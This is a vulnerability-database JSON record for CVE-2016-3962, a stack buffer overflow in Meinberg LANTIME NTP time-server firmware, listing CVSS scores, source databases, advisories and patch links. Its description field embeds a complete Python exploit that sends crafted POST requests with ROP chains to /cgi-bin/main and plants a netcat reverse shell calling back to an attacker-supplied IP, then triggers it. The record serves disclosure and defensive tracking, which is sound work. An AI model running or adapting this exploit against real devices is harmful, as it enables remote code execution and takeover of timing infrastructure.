"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2016-3962",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-92781",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2016-3962",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-3962",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-3962",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201606-551",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-92781",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-92781"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. \nRemote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible. \nThe following products are affected :\nMeinberg IMS-LANTIME M3000 Version 6.0 and prior\nMeinberg IMS-LANTIME M1000 Version 6.0 and prior\nMeinberg IMS-LANTIME M500 Version 6.0 and prior\nMeinberg LANTIME M900 Version 6.0 and prior\nMeinberg LANTIME M600 Version 6.0 and prior\nMeinberg LANTIME M400 Version 6.0 and prior\nMeinberg LANTIME M300 Version 6.0 and prior\nMeinberg LANTIME M200 Version 6.0 and prior\nMeinberg LANTIME M100 Version 6.0 and prior\nMeinberg SyncFire 1100 Version 6.0 and prior\nMeinberg LCES Version 6.0 and prior. Meinberg IMS-LANTIME M3000 etc. are all NTP time servers of German Meinberg company. #!/usr/bin/python\n#\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\n#\n# 271 - trigger notifications\n# 299 - copy user defined notifications\n \n# Kernel Version: 2.6.15.1\n# System Version: 530 \n# Lantime configuration utility 1.27\n# ELX800/GPS M4x V5.30p\n \nimport socket\nimport struct\nimport telnetlib\nimport sys\nimport time\n \nif len(sys.argv) \u003c 3:\n print \"[-] \u003cHost\u003e \u003cCallback IP\u003e \"\n exit(1)\n \n \nhost = sys.argv[1]\ncallback_ip = sys.argv[2]\n \nprint \"[+] exploiting Meinburg M400\"\nport = 80\n \n###################################################################\n#\n# Copy user_defined_notification to /www/filetmp\n# Append reverse shell string to /file/tmp \n#\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n \nparam = \"A\" * 0x2850\n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n \nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\n \n#must have a listener setup to receive the callback connection on ip 192.168.60.232\n# i.e. nc -v -l -p 4444\ncommand = \u0027cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash\u003c/tmp/foo|{nc,\u0027 + callback_ip +\u00270,4444}\u003e/tmp/foo;\" \u003e\u003e /www/filetmp\u0027\n \nmsg = \"button=\" + \"A\"*10028\nmsg += struct.pack(\"I\", system )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", some_str )\nmsg += command + \"\\x00\"\n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n \ntime.sleep(1)\n \n###################################################################\n#\n# Copy /www/filetmp to user_defined_notification \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n \nparam = \"A\" * 0x2850\n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n \nsend_cmd = 0x807ED88\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\nret = 0x804CE65\n \n#stack pivot\nstack_pivot = 0x8049488\nmsg = \"button=\" + \"A\" * 9756\n \nmsg += \"B\" * 28\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\nmsg += struct.pack(\"I\", ret ) * (71/4)\n \nmsg += struct.pack(\"I\", send_cmd )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\nmsg += struct.pack(\"I\", some_str ) # buffer\nmsg += struct.pack(\"I\", 0xffffffff ) # count\nmsg += \"E\" * 120\n \nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\nmsg += \"A\" * 100\n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close\n \ntime.sleep(1)\n \n###################################################################\n#\n# Trigger reverse shell \n# \n \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n \nparam = \"A\" * 0x2850\n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n \nsend_cmd = 0x807ED88\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\nret = 0x804CE65\n \n#stack pivot\nstack_pivot = 0x8049488\nmsg = \"button=\" + \"A\" * 9756\n \nmsg += \"B\" * 28\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\nmsg += struct.pack(\"I\", ret ) * (71/4)\n \nmsg += struct.pack(\"I\", send_cmd )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\nmsg += struct.pack(\"I\", some_str ) # buffer\nmsg += struct.pack(\"I\", 0xffffffff ) # count\nmsg += \"E\" * 120\n \nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\nmsg += \"A\" * 100\n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n \ntime.sleep(1)\n \n \nprint \"[+] cleaning up\"\n###################################################################\n#\n# Kill all mains that are hung-up\n#\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n \nparam = \"A\" * 0x2850\n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n \nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\n \ncommand = \u0027killall main\u0027\n \nmsg = \"button=\" + \"A\"*10028\nmsg += struct.pack(\"I\", system )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", some_str )\nmsg += command + \"\\x00\"\n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n \nprint \"[+] enjoy\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3962"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "BID",
"id": "91400"
},
{
"db": "VULHUB",
"id": "VHN-92781"
},
{
"db": "PACKETSTORM",
"id": "137947"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-92781",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-92781"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3962",
"trust": 2.9
},
{
"db": "ICS CERT",
"id": "ICSA-16-175-03",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "40120",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551",
"trust": 0.7
},
{
"db": "BID",
"id": "91400",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "137947",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-92781",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-92781"
},
{
"db": "BID",
"id": "91400"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "PACKETSTORM",
"id": "137947"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"id": "VAR-201607-0010",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-92781"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:02:54.663000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Meinberg Security Advisory: [MBGSA-1604] WebUI and NTP",
"trust": 0.8,
"url": "https://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1604-webui-and-ntp.htm"
},
{
"title": "Multiple Meinberg Product-based stack-based buffer overflow vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=62467"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-92781"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-16-175-03"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/40120/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3962"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3962"
},
{
"trust": 0.1,
"url": "https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/"
},
{
"trust": 0.1,
"url": "https://github.com/securifera/cve-2016-3962-exploit"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3962"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-92781"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "PACKETSTORM",
"id": "137947"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-92781"
},
{
"db": "BID",
"id": "91400"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "PACKETSTORM",
"id": "137947"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-03T00:00:00",
"db": "VULHUB",
"id": "VHN-92781"
},
{
"date": "2016-06-23T00:00:00",
"db": "BID",
"id": "91400"
},
{
"date": "2016-07-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"date": "2016-07-18T21:50:07",
"db": "PACKETSTORM",
"id": "137947"
},
{
"date": "2016-06-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"date": "2016-07-03T14:59:03.477000",
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-03T00:00:00",
"db": "VULHUB",
"id": "VHN-92781"
},
{
"date": "2016-06-23T00:00:00",
"db": "BID",
"id": "91400"
},
{
"date": "2016-07-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"date": "2016-07-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "137947"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Meinberg Runs on device firmware NTP Time Server Interface-based stack-based buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.